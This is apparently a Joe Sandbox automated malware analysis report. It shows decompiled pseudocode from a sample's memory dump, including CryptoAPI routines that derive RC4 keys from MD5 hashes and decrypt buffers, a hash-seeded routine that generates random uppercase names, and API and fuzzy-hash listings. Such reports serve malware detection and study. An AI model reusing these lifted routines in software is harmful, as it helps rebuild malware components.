                                                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x007b8096
                                                                                                                                                                                                                                                                            0x007b80a1
                                                                                                                                                                                                                                                                            0x007b8246
                                                                                                                                                                                                                                                                            0x007b824c
                                                                                                                                                                                                                                                                            0x007b80c5
                                                                                                                                                                                                                                                                            0x007b80c8
                                                                                                                                                                                                                                                                            0x007b80d8
                                                                                                                                                                                                                                                                            0x007b80de
                                                                                                                                                                                                                                                                            0x007b80e5
                                                                                                                                                                                                                                                                            0x007b80fb
                                                                                                                                                                                                                                                                            0x007b8103
                                                                                                                                                                                                                                                                            0x007b810a
                                                                                                                                                                                                                                                                            0x007b8113
                                                                                                                                                                                                                                                                            0x007b8119
                                                                                                                                                                                                                                                                            0x007b812d
                                                                                                                                                                                                                                                                            0x007b8134
                                                                                                                                                                                                                                                                            0x007b8140
                                                                                                                                                                                                                                                                            0x007b8149
                                                                                                                                                                                                                                                                            0x007b8162
                                                                                                                                                                                                                                                                            0x007b816b
                                                                                                                                                                                                                                                                            0x007b817e
                                                                                                                                                                                                                                                                            0x007b818c
                                                                                                                                                                                                                                                                            0x007b819e
                                                                                                                                                                                                                                                                            0x007b81b1
                                                                                                                                                                                                                                                                            0x007b81d3
                                                                                                                                                                                                                                                                            0x007b81d8
                                                                                                                                                                                                                                                                            0x007b81e2
                                                                                                                                                                                                                                                                            0x007b81f1
                                                                                                                                                                                                                                                                            0x007b81fa
                                                                                                                                                                                                                                                                            0x007b8202
                                                                                                                                                                                                                                                                            0x007b820e
                                                                                                                                                                                                                                                                            0x007b8219
                                                                                                                                                                                                                                                                            0x007b8227
                                                                                                                                                                                                                                                                            0x007b822c
                                                                                                                                                                                                                                                                            0x007b822c
                                                                                                                                                                                                                                                                            0x007b8202
                                                                                                                                                                                                                                                                            0x007b81e2
                                                                                                                                                                                                                                                                            0x007b816b
                                                                                                                                                                                                                                                                            0x007b8134
                                                                                                                                                                                                                                                                            0x007b8233
                                                                                                                                                                                                                                                                            0x007b8240
                                                                                                                                                                                                                                                                            0x007b8240
                                                                                                                                                                                                                                                                            0x007b8233
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b80e5

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B80D8
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B8240
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B8AD3
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: GetLastError.KERNEL32 ref: 007B8ADD
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8B0C
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 007B8B37
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B8B5E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 007B8B7A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 007B8B87
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 007B8B91
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8B9D
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007B81F1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 142027497-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5edd7462295f6a247c6304bb0f6b1fca7d81cfe4a9d8cc28ab0129d8daf0d4cf
                                                                                                                                                                                                                                                                            • Instruction ID: a4f8ac14815916c5e8dc5551bcf4fe8a735e1978fdbfd0f702a9250387a12f56
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5edd7462295f6a247c6304bb0f6b1fca7d81cfe4a9d8cc28ab0129d8daf0d4cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A451F4B4E00209EFDB54DF98D995BEEB7B9BB48304F148159E905BB381D734AA40CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                                                            			E007B5930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                                            				void _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                            					E007B7B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                            					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                            					asm("movsw");
                                                                                                                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                                                                                                                            					_v56 = 0;
                                                                                                                                                                                                                                                                            					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                            						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                            						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                            						if(_v56 == 0) {
                                                                                                                                                                                                                                                                            							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x007b5938
                                                                                                                                                                                                                                                                            0x007b5943
                                                                                                                                                                                                                                                                            0x007b5971
                                                                                                                                                                                                                                                                            0x007b5986
                                                                                                                                                                                                                                                                            0x007b5988
                                                                                                                                                                                                                                                                            0x007b598a
                                                                                                                                                                                                                                                                            0x007b598b
                                                                                                                                                                                                                                                                            0x007b599d
                                                                                                                                                                                                                                                                            0x007b59c6
                                                                                                                                                                                                                                                                            0x007b59d6
                                                                                                                                                                                                                                                                            0x007b59dc
                                                                                                                                                                                                                                                                            0x007b59e2
                                                                                                                                                                                                                                                                            0x007b59e2
                                                                                                                                                                                                                                                                            0x007b59ee
                                                                                                                                                                                                                                                                            0x007b599a
                                                                                                                                                                                                                                                                            0x007b599a
                                                                                                                                                                                                                                                                            0x007b599d
                                                                                                                                                                                                                                                                            0x007b59fb

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharUpperA.USER32(00000000), ref: 007B59E2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • abcdefghijklmnopqrstuvwxyz, xrefs: 007B597E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CharUpper
                                                                                                                                                                                                                                                                            • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                            • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                            • Opcode ID: 67ecdd15d7f8cd6a4dd757b0fcd14d955121a3d9317f82817500eba3c9bee0d1
                                                                                                                                                                                                                                                                            • Instruction ID: 9db4b5b558778584cffee734f53b46af763ea329ec6cc64255acba2b6b0da308
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67ecdd15d7f8cd6a4dd757b0fcd14d955121a3d9317f82817500eba3c9bee0d1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F213931906208EBCF04CF98D584BEEBBB6FF85315F248565F80467240D379AA45CB50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B9400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				char _v91;
                                                                                                                                                                                                                                                                            				char _v92;
                                                                                                                                                                                                                                                                            				char _v220;
                                                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                            					_t56 = E007B7B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                            					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                            					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                                            					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                            						E007B7D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                            						_t59 = E007B8BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                            						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                            						_v40 = _t59;
                                                                                                                                                                                                                                                                            						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                            							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v12 = _v220;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                            						E007B9650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                            						E007B7D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                            						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                            						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                            						_v91 = 0;
                                                                                                                                                                                                                                                                            						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                            						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                            						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x007b9409
                                                                                                                                                                                                                                                                            0x007b9414
                                                                                                                                                                                                                                                                            0x007b943d
                                                                                                                                                                                                                                                                            0x007b9442
                                                                                                                                                                                                                                                                            0x007b9451
                                                                                                                                                                                                                                                                            0x007b9454
                                                                                                                                                                                                                                                                            0x007b9466
                                                                                                                                                                                                                                                                            0x007b9480
                                                                                                                                                                                                                                                                            0x007b949a
                                                                                                                                                                                                                                                                            0x007b949f
                                                                                                                                                                                                                                                                            0x007b94a2
                                                                                                                                                                                                                                                                            0x007b94a9
                                                                                                                                                                                                                                                                            0x007b94bf
                                                                                                                                                                                                                                                                            0x007b94ab
                                                                                                                                                                                                                                                                            0x007b94b1
                                                                                                                                                                                                                                                                            0x007b94b1
                                                                                                                                                                                                                                                                            0x007b94d1
                                                                                                                                                                                                                                                                            0x007b94ed
                                                                                                                                                                                                                                                                            0x007b94fd
                                                                                                                                                                                                                                                                            0x007b9502
                                                                                                                                                                                                                                                                            0x007b9513
                                                                                                                                                                                                                                                                            0x007b9519
                                                                                                                                                                                                                                                                            0x007b9521
                                                                                                                                                                                                                                                                            0x007b9533
                                                                                                                                                                                                                                                                            0x007b953c
                                                                                                                                                                                                                                                                            0x007b9545
                                                                                                                                                                                                                                                                            0x007b9460
                                                                                                                                                                                                                                                                            0x007b9463
                                                                                                                                                                                                                                                                            0x007b9463
                                                                                                                                                                                                                                                                            0x007b9466
                                                                                                                                                                                                                                                                            0x007b9553

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B8BFF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: GetLastError.KERNEL32 ref: 007B8C09
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8C38
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 007B8C59
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007B8C71
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 007B8C99
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 007B8CC1
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 007B8CD5
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8CE1
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 007B9513
                                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 007B9521
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                            • Opcode ID: a2b3454622983e133885a76935df56ace6499253983c161b84367aa66e6d2463
                                                                                                                                                                                                                                                                            • Instruction ID: e38443058704be15f5c81e648d9323d52e49441551e302fa1ef7cacb766a5892
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2b3454622983e133885a76935df56ace6499253983c161b84367aa66e6d2463
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78412CB1D00248EFDB04DFD4C885BEEBBB5EF58304F108199E615AB285D778AA45CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 007B4C19
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 007B4C49
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 007B4C60
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 007B4C77
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 007B56F0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$ObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2825510553-0
                                                                                                                                                                                                                                                                            • Opcode ID: 84b01170703dd11d2560712dc990653cba98e7bb0fdb25fcf8f61ecee89f5c7f
                                                                                                                                                                                                                                                                            • Instruction ID: d8b0fef2980cb6375f29c693114d3ecae0ff8f8fb74bc63effcc6c7fe611448c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84b01170703dd11d2560712dc990653cba98e7bb0fdb25fcf8f61ecee89f5c7f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E06D31B002049FCB00CFA4D880BEEBBB0EF58725F548249D801EA201D238E890DB74
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B97A0(long _a4) {
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x007b97b0
                                                                                                                                                                                                                                                                            0x007b97b7

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,007B9FB2,?,007B9FB2,00000000,?,?,?,007B9E2D), ref: 007B97A9
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,007B9FB2,00000000,?,?,?,007B9E2D), ref: 007B97B0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0496a6b7542a81ffabe3500175a49fa2f3876afe66d24853cf1cf482f196c4e7
                                                                                                                                                                                                                                                                            • Instruction ID: 65fa35e71b15207abab023db7e94e2dd0c60444cdb8e7a2c42bb2cc9b7c5e46f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0496a6b7542a81ffabe3500175a49fa2f3876afe66d24853cf1cf482f196c4e7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79C09B71144308EBD641BBD8EC0DF95375DE74C601F00C101B70DC6150CA74A5444776
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                                                            			E007B8CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				long* _v24;
                                                                                                                                                                                                                                                                            				char* _t31;
                                                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                                                            				long** _t35;
                                                                                                                                                                                                                                                                            				char* _t52;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L15:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t31 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                                                            						_t32 = GetLastError();
                                                                                                                                                                                                                                                                            						_v16 = _t32;
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t52 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                            						if(_t32 != 0) {
                                                                                                                                                                                                                                                                            							_t34 = _a16;
                                                                                                                                                                                                                                                                            							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                            							if(_t34 != 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								_t35 =  &_v24;
                                                                                                                                                                                                                                                                            								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                            								if(_t35 != 0) {
                                                                                                                                                                                                                                                                            									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                            									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L15;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x007b8cf6
                                                                                                                                                                                                                                                                            0x007b8d01
                                                                                                                                                                                                                                                                            0x007b8e1a
                                                                                                                                                                                                                                                                            0x007b8e20
                                                                                                                                                                                                                                                                            0x007b8d25
                                                                                                                                                                                                                                                                            0x007b8d25
                                                                                                                                                                                                                                                                            0x007b8d35
                                                                                                                                                                                                                                                                            0x007b8d3f
                                                                                                                                                                                                                                                                            0x007b8d47
                                                                                                                                                                                                                                                                            0x007b8d49
                                                                                                                                                                                                                                                                            0x007b8d4f
                                                                                                                                                                                                                                                                            0x007b8d59
                                                                                                                                                                                                                                                                            0x007b8d6d
                                                                                                                                                                                                                                                                            0x007b8d78
                                                                                                                                                                                                                                                                            0x007b8d78
                                                                                                                                                                                                                                                                            0x007b8d59
                                                                                                                                                                                                                                                                            0x007b8d82
                                                                                                                                                                                                                                                                            0x007b8d99
                                                                                                                                                                                                                                                                            0x007b8da1
                                                                                                                                                                                                                                                                            0x007b8da5
                                                                                                                                                                                                                                                                            0x007b8db1
                                                                                                                                                                                                                                                                            0x007b8db9
                                                                                                                                                                                                                                                                            0x007b8dbb
                                                                                                                                                                                                                                                                            0x007b8dc2
                                                                                                                                                                                                                                                                            0x007b8dd5
                                                                                                                                                                                                                                                                            0x007b8ddd
                                                                                                                                                                                                                                                                            0x007b8df7
                                                                                                                                                                                                                                                                            0x007b8dfe
                                                                                                                                                                                                                                                                            0x007b8dfe
                                                                                                                                                                                                                                                                            0x007b8ddd
                                                                                                                                                                                                                                                                            0x007b8e08
                                                                                                                                                                                                                                                                            0x007b8e08
                                                                                                                                                                                                                                                                            0x007b8e14
                                                                                                                                                                                                                                                                            0x007b8e14
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b8d82

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B8D3F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B8D49
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8D78
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 007B8D99
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007B8DB1
                                                                                                                                                                                                                                                                            • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 007B8DD5
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 007B8DF1
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 007B8DFE
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 007B8E08
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8E14
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B8D30
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B8D68
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: 911f5d565ae6ff0c234b1682d5fc4f6da6fcdda6d2c2aa5b19af92df02f318c9
                                                                                                                                                                                                                                                                            • Instruction ID: 13edf54a8de4e09b18258be2c89b2800bed6fe8a2149b72ad44fe45f653f427b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 911f5d565ae6ff0c234b1682d5fc4f6da6fcdda6d2c2aa5b19af92df02f318c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96312A75A40209EBEB51DFA4CD89FEE7779BB48705F10C548F601AA1C0CBB89A40CB61
